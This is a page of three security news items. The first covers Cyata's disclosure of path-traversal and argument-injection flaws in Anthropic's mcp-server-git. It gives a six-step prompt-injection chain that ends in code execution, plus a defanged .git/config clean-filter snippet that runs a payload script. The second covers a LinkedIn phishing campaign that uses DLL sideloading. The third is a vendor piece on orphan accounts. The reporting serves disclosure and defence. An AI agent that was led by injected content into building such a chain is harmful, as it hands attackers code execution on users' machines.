Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution
A set of three security vulnerabilities has been disclosed in mcp-server-git, the official Git Model Context Protocol (MCP) server maintained by Anthropic, that could be exploited to read or delete arbitrary files and execute code under certain conditions. “These flaws can be exploited through prompt injection, meaning an attacker who can influence what an AI assistant reads (a malicious README, a poisoned issue description, a compromised webpage) can weaponize these vulnerabilities without any direct access to the victim’s system,” Cyata researcher Yarden Porat said in a report shared with The Hacker News. Mcp-server-git is a Python package and an MCP server that provides a set of built-in tools to read, search, and manipulate Git repositories programmatically via large language models (LLMs). The security issues, which have been addressed in versions 2025.9.25 and 2025.12.18 following responsible disclosure in June 2025, are listed below -

CVE-2025-68143 (CVSS score: 8.8 [v3] / 6.5 [v4]) - A path traversal vulnerability arising from the git_init tool accepting arbitrary file system paths during repository creation without validation (fixed in version 2025.9.25)
CVE-2025-68144 (CVSS score: 8.1 [v3] / 6.4 [v4]) - An argument injection vulnerability arising from the git_diff and git_checkout functions passing user-controlled arguments directly to git CLI commands without sanitization (fixed in version 2025.12.18)
CVE-2025-68145 (CVSS score: 7.1 [v3] / 6.3 [v4]) - A path traversal vulnerability arising from missing path validation when using the --repository flag to limit operations to a specific repository path (fixed in version 2025.12.18)

Successful exploitation of the above vulnerabilities could allow an attacker to turn any directory on the system into a Git repository, overwrite any file with an empty diff, and access any repository on the server.
In an attack scenario documented by Cyata, the three vulnerabilities could be chained with the Filesystem MCP server to write to a “.git/config” file (typically located within the hidden .git directory) and achieve remote code execution by triggering a call to git_init by means of a prompt injection:

1. Use git_init to create a repo in a writable directory
2. Use the Filesystem MCP server to write a malicious .git/config with a clean filter
3. Write a .gitattributes file to apply the filter to certain files
4. Write a shell script with the payload
5. Write a file that triggers the filter
6. Call git_add, which executes the clean filter, running the payload

In response to the findings, the git_init tool has been removed from the package, and extra validation has been added to prevent path traversal primitives. Users of the Python package are recommended to update to the latest version for optimal protection. “This is the canonical Git MCP server, the one developers are expected to copy,” Shahar Tal, CEO and co-founder of agentic AI security company Cyata, said.
“If security boundaries break down even in the reference implementation, it’s a signal that the entire MCP ecosystem needs deeper scrutiny. These are not edge cases or exotic configurations; they work out of the box.”
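For context on the clean-filter step in the chain Cyata describes: a Git "clean" filter is a command Git runs over a file's contents whenever a matching file is staged. A defanged sketch of what the attacker-written .git/config could look like follows — the filter name and script path are illustrative, not Cyata's actual proof-of-concept:

```ini
; .git/config - normally managed by Git itself, but writable in this
; scenario via the Filesystem MCP server. The "clean" command runs
; whenever a file matched by .gitattributes is staged.
[filter "lint"]
	clean = sh payload.sh
```

Paired with a .gitattributes entry such as `* filter=lint`, any subsequent staging operation (including the git_add MCP tool) causes Git to invoke `sh payload.sh`, which is what turns a pair of file writes into code execution.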
Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading
Cybersecurity researchers have uncovered a new phishing campaign that exploits social media private messages to propagate malicious payloads, likely with the intent to deploy a remote access trojan (RAT). The activity delivers “weaponized files via Dynamic Link Library (DLL) sideloading, combined with a legitimate, open-source Python pen-testing script,” ReliaQuest said in a report shared with The Hacker News. The attack involves approaching high-value individuals through messages sent on LinkedIn, establishing trust, and deceiving them into downloading a malicious WinRAR self-extracting archive (SFX). Once launched, the archive extracts four different components -

A legitimate open-source PDF reader application
A malicious DLL that’s sideloaded by the PDF reader
A portable executable (PE) of the Python interpreter
A RAR file that likely serves as a decoy

The infection chain gets activated when the PDF reader application is run, causing the rogue DLL to be sideloaded.
The use of DLL sideloading has become an increasingly common technique among threat actors to evade detection and conceal signs of malicious activity by taking advantage of legitimate processes. Over the past week, at least three documented campaigns have leveraged DLL sideloading to deliver malware families tracked as LOTUSLITE and PDFSIDER, along with other commodity trojans and information stealers. In the campaign observed by ReliaQuest, the sideloaded DLL drops the Python interpreter onto the system and creates a Windows Registry Run key that ensures the interpreter is automatically executed upon every login. The interpreter’s primary responsibility is to decode and run a Base64-encoded, open-source shellcode payload directly in memory, avoiding forensic artifacts on disk.
The final payload attempts to communicate with an external server, granting the attackers persistent remote access to the compromised host and exfiltrating data of interest. The abuse of legitimate open-source tools, coupled with the use of phishing messages sent on social media platforms, shows that phishing attacks are not confined to emails alone and that alternative delivery methods can exploit security gaps to increase the odds of success and break into corporate environments. ReliaQuest told The Hacker News that the campaign appears to be broad and opportunistic, with activity spanning various sectors and regions. “That said, because this activity plays out in direct messages, and social media platforms are typically less monitored than email, it’s difficult to quantify the full scale,” it added.
“This approach allows attackers to bypass detection and scale their operations with minimal effort while maintaining persistent control over compromised systems,” the cybersecurity company said. “Once inside, they can escalate privileges, move laterally across networks, and exfiltrate data.” This is not the first time LinkedIn has been misused for targeted attacks. In recent years, multiple North Korean threat actors , including those linked to the CryptoCore and Contagious Interview campaigns, have singled out victims by contacting them on LinkedIn under the pretext of a job opportunity and convincing them to run a malicious project as part of a supposed assessment or code review. In March 2025, Cofense also detailed a LinkedIn-themed phishing campaign that employs lures related to LinkedIn InMail notifications to get recipients to click on a “Read More” or “Reply To” button and download the remote desktop software developed by ConnectWise for gaining complete control over victim hosts.
“Social media platforms commonly used by businesses represent a gap in most organizations’ security posture,” ReliaQuest said. “Unlike email, where organizations tend to have security monitoring tools, social media private messages lack visibility and security controls, making them an attractive delivery channel for phishing campaigns.” “Organizations must recognize social media as a critical attack surface for initial access and extend their defenses beyond email-centric controls.”
The Hidden Risk of Orphan Accounts
The Problem: The Identities Left Behind

As organizations grow and evolve, employees, contractors, services, and systems come and go - but their accounts often remain. These abandoned or “orphan” accounts sit dormant across applications, platforms, assets, and cloud consoles. The reason they persist isn’t negligence - it’s fragmentation. Traditional IAM and IGA systems are designed primarily for human users and depend on manual onboarding and integration for each application - connectors, schema mapping, entitlement catalogs, and role modeling.
Many applications never make it that far. Meanwhile, non-human identities (NHIs) - service accounts, bots, APIs, and agent-AI processes - are natively ungoverned, operating outside standard IAM frameworks and often without ownership, visibility, or lifecycle controls. The result? A shadow layer of untracked identities forming part of the broader identity dark matter - accounts invisible to governance but still active in infrastructure.
Why They’re Not Tracked

Integration Bottlenecks: Every app requires a unique configuration before IAM can manage it. Unmanaged and local systems are rarely prioritized.
Partial Visibility: IAM tools see only the “managed” slice of identity - leaving behind local admin accounts, service identities, and legacy systems.
Complex Ownership: Turnover, mergers, and distributed teams make it unclear who owns which application or account.
AI Agents and Automation: Agent-AI introduces a new category of semi-autonomous identities that act independently from their human operators, further breaking the IAM model.

The Real-World Risk

Orphan accounts are the unlocked back doors of the enterprise. They hold valid credentials, often with elevated privileges, but no active owner.
Attackers know this and use them.

Colonial Pipeline (2021) - attackers entered via an old/inactive VPN account with no MFA. Multiple sources corroborate the “inactive/legacy” account detail.
Manufacturing company hit by Akira ransomware (2025) - the breach came through a “ghost” third-party vendor account that wasn’t deactivated (i.e., an orphaned vendor account), per a SOC write-up from Barracuda Managed XDR.
M&A context - during post-acquisition consolidation, it’s common to discover thousands of stale accounts/tokens; enterprises note orphaned (often NHI) identities as a persistent post-M&A threat, citing very high rates of still-active former-employee tokens.

Orphan accounts fuel multiple risks:

Compliance exposure: Violates least-privilege and deprovisioning requirements (ISO 27001, NIS2, PCI DSS, FedRAMP).
Operational inefficiency: Inflated license counts and unnecessary audit overhead.
Incident response drag: Forensics and remediation slow down when unseen accounts are involved.

The Way Forward: Continuous Identity Audit

Enterprises need evidence, not assumptions. Eliminating orphan accounts requires full identity observability - the ability to see and verify every account, permission, and activity, whether managed or not. Modern mitigation includes:

Identity Telemetry Collection: Extract activity signals directly from applications, managed and unmanaged.
Unified Audit Trail: Correlate joiner/mover/leaver events, authentication logs, and usage data to confirm ownership and legitimacy.
Role Context Mapping: File real usage insights and privilege context into identity profiles - showing who used what, when, and why.
Continuous Enforcement: Automatically flag or decommission accounts with no activity or ownership, reducing risk without waiting for manual reviews.

When this telemetry feeds into a central identity audit layer, it closes the visibility gap, turning orphan accounts from hidden liabilities into measurable, managed entities.
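The continuous-enforcement idea can be sketched as a simple policy over per-account telemetry. This is a minimal illustration only: the record shape, field names, and the 90-day dormancy threshold are assumptions for the example, not any specific product's API.

```typescript
// Minimal per-account telemetry record (illustrative shape).
interface AccountRecord {
  id: string;
  owner: string | null;       // null means no confirmed owner
  lastActivity: Date | null;  // null means no activity ever observed
}

const DORMANCY_DAYS = 90; // assumed policy threshold

// Flag accounts that have no owner, or no activity inside the dormancy window.
function flagOrphans(accounts: AccountRecord[], now: Date): string[] {
  const cutoff = now.getTime() - DORMANCY_DAYS * 24 * 60 * 60 * 1000;
  return accounts
    .filter(a =>
      a.owner === null ||
      a.lastActivity === null ||
      a.lastActivity.getTime() < cutoff)
    .map(a => a.id);
}

const flagged = flagOrphans(
  [
    { id: "svc-backup", owner: null, lastActivity: new Date("2026-01-10T00:00:00Z") },
    { id: "j.doe", owner: "j.doe", lastActivity: new Date("2025-06-01T00:00:00Z") },
    { id: "ci-bot", owner: "platform", lastActivity: new Date("2026-01-20T00:00:00Z") },
  ],
  new Date("2026-01-22T00:00:00Z"),
);
console.log(flagged); // flags svc-backup (no owner) and j.doe (dormant)
```

In a real deployment this decision would feed a review or deprovisioning workflow rather than an immediate deletion, since ownership data is often the part that is stale.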
To learn more, visit Audit Playbook: Continuous Application Inventory Reporting.

The Orchid Perspective

Orchid’s Identity Audit capability delivers this foundation. By combining application-level telemetry with automated audit collection, it provides verifiable, continuous insight into how identities - human, non-human, and agent-AI - are actually used. It’s not another IAM system; it’s the connective tissue that ensures IAM decisions are based on evidence, not estimation.
Note: This article was written and contributed by Roy Katmor, CEO of Orchid Security. This article is a contributed piece from one of our valued partners.